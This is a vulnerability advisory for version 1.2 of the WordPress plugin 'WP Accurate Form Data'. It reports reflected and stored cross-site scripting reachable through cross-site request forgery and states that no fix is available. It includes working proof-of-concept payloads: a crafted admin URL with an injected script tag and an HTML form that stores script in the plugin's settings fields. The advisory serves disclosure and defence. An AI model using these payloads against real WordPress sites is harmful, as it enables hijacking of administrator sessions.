WordPress WP Accurate Form Data plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
1e8930b446abec4c86b901f0882c42c8d200ca7fe62fa9da5d89f2f93b73148a
Title: WordPress 'WP Accurate Form Data' Plugin
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download:
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
The plugin performs E-mail and Physical Address validations automatically for most wordpress contact forms.
## XSS Vulnerabilities
==========================================================
The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the url).
http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>
----
The options on the admin settings page are displayed/stored without sanitization. This can be exploited with a crafted POST request.
PoC (using CSRF):
Log in as admin and submit the following form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP">
<input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br />
<text>wCheckEmailValidity: </text>
<input type="text" name="wCheckEmailValidity" value=""><br />
<input type="text" name="wIncludeOpen" value=""><br />
<input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br />
<input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br />
<input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
<input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br />
<input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br />
<input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br />
<input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br />
<input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br />
<input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br />
<text>wSub </text>
<input type="text" name="wSub" value="Save Changes" readonly><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.